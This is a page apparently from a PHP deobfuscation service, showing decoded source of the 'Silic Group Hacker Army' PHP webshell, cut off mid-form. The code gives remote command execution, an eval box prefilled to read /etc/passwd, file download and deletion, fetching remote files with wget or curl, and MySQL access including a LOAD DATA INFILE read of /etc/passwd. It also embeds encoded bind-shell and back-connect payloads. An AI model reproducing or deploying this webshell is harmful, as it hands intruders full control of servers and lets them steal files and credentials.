Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php @session_start(); @set_time_limit(0); @error_reporting(0); $salt = "silic1234";..

Decoded Output download


if(isset($_GET['dl']) && ($_GET['dl'] != "")){ $file = $_GET['dl']; $filez = @file_get_contents($file); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\"".basename($file)."\";"); echo $filez; exit; } elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != "")){ $file = $_GET['dlgzip']; $filez = gzencode(@file_get_contents($file)); header("Content-Type:application/x-gzip
"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\"".basename($file).".gz\";"); echo $filez; exit; } if(isset($_GET['img'])){ @ob_clean(); $d = magicboom($_GET['y']); $f = $_GET['img']; $inf = @getimagesize($d.$f); $ext = explode($f,"."); $ext = $ext[count($ext)-1]; @header("Content-type: ".$inf["mime"]); @header("Cache-control: public"); @header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); @header("Cache-control: max-age=".(60*60*24*7)); @readfile($d.$f); exit; } $ver = "blackbap.org"; $software = getenv("SERVER_SOFTWARE"); if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE; else $safemode = FALSE; $system = @php_uname(); if(strtolower(substr($system,0,3)) == "win") $win = TRUE; else $win = FALSE; if(isset($_GET['y'])){ if(@is_dir($_GET['view'])){ $pwd = $_GET['view']; @chdir($pwd); } else{ $pwd = $_GET['y']; @chdir($pwd); } } if(!$win){ if(!$user = rapih(exe("whoami"))) $user = ""; if(!$id = rapih(exe("id"))) $id = ""; $prompt = $user." \$ "; $pwd = @getcwd().DIRECTORY_SEPARATOR; } else { $user = @get_current_user(); $id = $user; $prompt = $user." &gt;"; $pwd = realpath(".")."\"; $v = explode("\",$d); $v = $v[0]; foreach (range("A","Z") as $letter) { $bool = @is_dir($letter.":\"); if ($bool) { $letters .= "<a href=\"?y=".$letter.":\">[ "; if ($letter.":" != $v) {$letters .= $letter;} else {$letters .= "<span class=\"gaya\">".$letter."</span>";} $letters .= " ]</a> "; } } } if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]); $my_ip = $_SERVER['REMOTE_ADDR']; $bindport = "13123"; $bindport_pass = "silic"; $pwds = explode(DIRECTORY_SEPARATOR,$pwd); $pwdurl = ""; for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){ $pathz = ""; for($j = 0 ; $j <= $i ; $j++){ $pathz .= $pwds[$j].DIRECTORY_SEPARATOR; } $pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>"; } if(isset($_POST['rename'])){ $old = $_POST['oldname']; $new = $_POST['newname']; @rename($pwd.$old,$pwd.$new); $file = $pwd.$new; } $buff = $software."<br />"; $buff .= $system."<br />"; if($id != "") $buff .= $id."<br />"; $buff .= "server ip : ".$server_ip." <span class=\"gaya\">|</span> your ip : ".$my_ip."<br />"; if($safemode) $buff .= "safemode <span class=\"gaya\">ON</span><br />"; else $buff .= "safemode <span class=\"gaya\">OFF<span><br />"; $buff .= $letters."&nbsp;&gt;&nbsp;".$pwdurl; function rapih($text){ return trim(str_replace("<br />","",$text)); } function magicboom($text){ if (!get_magic_quotes_gpc()) { return $text; } return stripslashes($text); } function showdir($pwd,$prompt){ $fname = array(); $dname = array(); if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $user = "????:????"; if($dh = opendir($pwd)){ while($file = readdir($dh)){ if(is_dir($file)){ $dname[] = $file; } elseif(is_file($file)){ $fname[] = $file; } } closedir($dh); } sort($fname); sort($dname); $path = @explode(DIRECTORY_SEPARATOR,$pwd); $tree = @sizeof($path); $parent = ""; $buff = " <form action=\"?y=".$pwd."&amp;x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\"> <table class=\"cmdbox\" style=\"width:50%;\"> <tr><td>$prompt</td><td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=\"\" /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr> </form> <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <tr><td>view file/folder</td><td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"".$pwd."\" /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr> </form></table><table class=\"explore\"> <tr><th>name</th><th style=\"width:80px;\">size</th><th style=\"width:210px;\">owner:group</th><th style=\"width:80px;\">perms</th><th style=\"width:110px;\">modified</th><th style=\"width:190px;\">actions</th></tr> "; if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR; else $parent = $pwd; foreach($dname as $folder){ if($folder == ".") { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $buff .= "<tr><td><a href=\"?y=".$pwd."\">$folder</a></td><td>LINK</td><td style=\"text-align:center;\">".$owner."</td><td>".get_perms($pwd)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\"titik1\"><a href=\"?y=$pwd&amp;edit=".$pwd."view.php\"></a> | <a href=\"javascript:tukar('titik1','titik1_form');\"></a></span> <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" /> </form></td></tr> "; } elseif($folder == "..") { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $buff .= "<tr><td><a href=\"?y=".$parent."\">$folder</a></td><td>LINK</td><td style=\"text-align:center;\">".$owner."</td><td>".get_perms($parent)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td><td><span id=\"titik2\"><a href=\"?y=$pwd&amp;edit=".$parent."view.php\"></a> | <a href=\"javascript:tukar('titik2','titik2_form');\"></a></span> <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" /> </form> </td></tr>"; } else { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $buff .= "<tr><td><a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\">[ $folder ]</a> <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" /> </form> <td>DIR</td><td style=\"text-align:center;\">".$owner."</td><td>".get_perms($pwd.$folder)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\"></a> | <a href=\"?y=$pwd&amp;fdelete=".$pwd.$folder."\"></a></td></tr>"; } } foreach($fname as $file){ $full = $pwd.$file; if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $buff .= "<tr><td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&amp;view=$full\">$file</a> <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" /> </form> </td><td>".ukuran($full)."</td><td style=\"text-align:center;\">".$owner."</td><td>".get_perms($full)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td> <td><a href=\"?y=$pwd&amp;edit=$full\"></a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\"></a> | <a href=\"?y=$pwd&amp;delete=$full\"></a> | <a href=\"?y=$pwd&amp;dl=$full\"></a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$full\">gzip</a>)</td></tr>"; } $buff .= "</table>"; return $buff; } function ukuran($file){ if($size = @filesize($file)){ if($size <= 1024) return $size; else{ if($size <= 1024*1024) { $size = @round($size / 1024,2);; return "$size kb"; } else { $size = @round($size / 1024 / 1024,2); return "$size mb"; } } } else return "???"; } function exe($cmd){ if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result){ $buff .= $result; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')){ $buff = @shell_exec($cmd); return $buff; } } function tulis($file,$text){ $textz = gzinflate(base64_decode($text)); if($filez = @fopen($file,"w")) { @fputs($filez,$textz); @fclose($file); } } function ambil($link,$file) { if($fp = @fopen($link,"r")){ while(!feof($fp)) { $cont.= @fread($fp,1024); } @fclose($fp); $fp2 = @fopen($file,"w"); @fwrite($fp2,$cont); @fclose($fp2); } } function which($pr){ $path = exe("which $pr"); if(!empty($path)) { return trim($path); } else { return trim($pr); } } function download($cmd,$url){ $namafile = basename($url); switch($cmd) { case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);break; case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);break; case 'wfread' : ambil($wurl,$namafile);break; case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break; case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break; case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break; case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break; default: break; } return $namafile; } function get_perms($file) { if($mode=@fileperms($file)){ $perms=''; $perms .= ($mode & 00400) ? 'r' : '-'; $perms .= ($mode & 00200) ? 'w' : '-'; $perms .= ($mode & 00100) ? 'x' : '-'; $perms .= ($mode & 00040) ? 'r' : '-'; $perms .= ($mode & 00020) ? 'w' : '-'; $perms .= ($mode & 00010) ? 'x' : '-'; $perms .= ($mode & 00004) ? 'r' : '-'; $perms .= ($mode & 00002) ? 'w' : '-'; $perms .= ($mode & 00001) ? 'x' : '-'; return $perms; } else return "??????????"; } function clearspace($text){ return str_replace(" ","_",$text); } $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf"; $port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8="; $back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw=="; $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw=="; ?> <html><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>::Silic Group Hacker Army PHP webshell - blackbap.org::</title> <script type="text/javascript"> function tukar(lama,baru){ document.getElementById(lama).style.display = 'none'; document.getElementById(baru).style.display = 'block'; } </script> <style type="text/css"> body{ background:#000000; } a { text-decoration:none; } a:hover{ border-bottom:1px solid #4C83AF; } *{ font-size:11px; font-family:Tahoma,Verdana,Arial,; color:#FFFFFF; } #menu{ background:#111111; margin:8px 2px 4px 2px; } #menu a{ padding:4px 18px; margin:0; background:#222222; text-decoration:none; letter-spacing:2px; } #menu a:hover{ background:#191919; border-bottom:1px solid #333333; border-top:1px solid #333333; } .tabnet{ margin:15px auto 0 auto; border: 1px solid #333333; } .main { width:100%; } .gaya { color: #4C83AF; } .inputz{ background:#111111; border:0; padding:2px; border-bottom:1px solid #222222; border-top:1px solid #222222; } .inputzbut{ background:#111111; color:#4C83AF; margin:0 4px; border:1px solid #444444; } .inputz:hover, .inputzbut:hover{ border-bottom:1px solid #4C83AF; border-top:1px solid #4C83AF; } .output { margin:auto; border:1px solid #4C83AF; width:100%; height:400px; background:#000000; padding:0 2px; } .cmdbox{ width:100%; } .head_info{ padding: 0 4px; } .b1{ font-size:30px; padding:0; color:#444444; } .b2{ font-size:30px; padding:0; color: #333333; } .b_tbl{ text-align:center; margin:0 4px 0 0; padding:0 4px 0 0; border-right:1px solid #333333; } .phpinfo table{ width:100%; padding:0 0 0 0; } .phpinfo td{ background:#111111; color:#cccccc; padding:6px 8px;; } .phpinfo th, th{ background:#191919; border-bottom:1px solid #333333; font-weight:normal; } .phpinfo h2, .phpinfo h2 a{ text-align:center; font-size:16px; padding:0; margin:30px 0 0 0; background:#222222; padding:4px 0; } .explore{ width:100%; } .explore a { text-decoration:none; } .explore td{ border-bottom:1px solid #333333; padding:0 8px; line-height:24px; } .explore th{ padding:3px 8px; font-weight:normal; } .explore th:hover , .phpinfo th:hover{ border-bottom:1px solid #4C83AF; } .explore tr:hover{ background:#111111; } .viewfile{ background:#EDECEB; color:#000000; margin:4px 2px; padding:8px; } .sembunyi{ display:none; padding:0;margin:0; } </style> </head> <body onLoad="document.getElementById('cmd').focus();"> <div class="main"> <!-- head info start here --> <div class="head_info"> <table><tr> <td><table class="b_tbl"><tr><td><a href="?"><span class="b1">Silic</span></a></td></tr><tr><td><?php echo $ver;?></td></tr></table></td> <td><?php echo $buff; ?></td> </tr></table> </div> <!-- head info end here --> <!-- menu start --> <div id="menu"> <a href="?<?php echo "y=".$pwd; ?>"></a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=shell">shell</a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=php">eval</a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=mysql">mysql</a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=phpinfo">phpinfo</a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=netsploit">netsploit</a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=upload"></a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=mail">mail</a> </div> <!-- menu end --> <?php if(isset($_GET['x']) && ($_GET['x'] == 'php')){ ?> <form action="?y=<?php echo $pwd; ?>&amp;x=php" method="post"> <table class="cmdbox"> <tr><td> <textarea class="output" name="cmd" id="cmd"> <?php if(isset($_POST['submitcmd'])) { echo eval(magicboom($_POST['cmd'])); } else echo "echo file_get_contents('/etc/passwd');"; ?> </textarea> <tr><td><input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form> </table> </form> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql')){ if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport'])){ $sqlhost = $_GET['sqlhost']; $sqluser = $_GET['sqluser']; $sqlpass = $_GET['sqlpass']; $sqlport = $_GET['sqlport']; if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){ $msg .= "<div style=\"width:99%;padding:4px 10px 0 10px;\">"; $msg .= "<p>Connected to ".$sqluser."<span class=\"gaya\">@</span>".$sqlhost.":".$sqlport; $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;\">[ databases ]</a>"; if(isset($_GET['db'])) $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$_GET['db']."\">".htmlspecialchars($_GET['db'])."</a>"; if(isset($_GET['table'])) $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$_GET['db']."&amp;table=".$_GET['table']."\">".htmlspecialchars($_GET['table'])."</a>"; $msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>"; $msg .= "</div>"; echo $msg; if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))){ $db = $_GET['db']; $query = "DROP TABLE IF EXISTS silic_table;
CREATE TABLE `silic_table` ( `file` LONGBLOB NOT NULL );
LOAD DATA INFILE \"/etc/passwd\"
INTO TABLE silic_table;SELECT * FROM silic_table;
DROP TABLE IF EXISTS silic_table;"; $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">$query</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $tables = array(); $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available tables on ".$db."</th></tr>"; $hasil = @mysql_list_tables($db,$con); while(list($table) = @mysql_fetch_row($hasil)){ @array_push($tables,$table); } @sort($tables); foreach($tables as $table){ $msg .= "<tr><td><a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."&amp;table=".$table."\">$table</a></td></tr>"; } $msg .= "</table>"; } elseif(isset($_GET['table']) && (!isset($_GET['sqlquery']))){ $db = $_GET['db']; $table = $_GET['table']; $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;"; $msgq = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <input type=\"hidden\" name=\"table\" value=\"".$table."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $columns = array(); $msg = "<table class=\"explore\" style=\"width:99%;\">"; $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table); while(list($column) = @mysql_fetch_row($hasil)){ $msg .= "<th>$column</th>"; $kolum = $column; } $msg .= "</tr>"; $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table); list($total) = mysql_fetch_row($hasil); if(isset($_GET['z'])) $page = (int) $_GET['z']; else $page = 1; $pagenum = 100; $totpage = ceil($total / $pagenum); $start = (($page - 1) * $pagenum); $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum); while($datas = @mysql_fetch_assoc($hasil)){ $msg .= "<tr>"; foreach($datas as $data){ if(trim($data) == "") $data = "&nbsp;"; $msg .= "<td>$data</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; $head = "<div style=\"padding:10px 0 0 6px;\"> <form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <input type=\"hidden\" name=\"table\" value=\"".$table."\" /> Page <select class=\"inputz\" name=\"z\" onchange=\"this.form.submit();\">"; for($i = 1;$i <= $totpage;$i++){ $head .= "<option value=\"".$i."\">".$i."</option>"; if($i == $_GET['z']) $head .= "<option value=\"".$i."\" selected=\"selected\">".$i."</option>"; } $head .= "</select><noscript><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" /></noscript></form></div>"; $msg = $msgq.$head.$msg; } elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")){ $db = $_GET['db']; $query = magicboom($_GET['sqlquery']); $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; @mysql_select_db($db); $querys = explode(";",$query); foreach($querys as $query){ if(trim($query) != ""){ $hasil = mysql_query($query); if($hasil){ $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>"; $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr>"; for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>"; $msg .= "</tr>"; for($i=0;$i<@mysql_num_rows($hasil);$i++) { $rows=@mysql_fetch_array($hasil); $msg .= "<tr>"; for($j=0;$j<@mysql_num_fields($hasil);$j++) { if($rows[$j] == "") $dataz = "&nbsp;"; else $dataz = $rows[$j]; $msg .= "<td>".$dataz."</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; } else $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>"; } } } else { $query = "SHOW PROCESSLIST;
SHOW VARIABLES;
SHOW STATUS;"; $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $dbs = array(); $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available databases</th></tr>"; $hasil = @mysql_list_dbs($con); while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); } @sort($dbs); foreach($dbs as $db){ $msg .= "<tr><td><a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."\">$db</a></td></tr>"; } $msg .= "</table>"; } @mysql_close($con); } else $msg = "<p style=\"text-align:center;\">cant connect to mysql server</p>"; echo $msg; } else{ ?> <form action="?" method="get"> 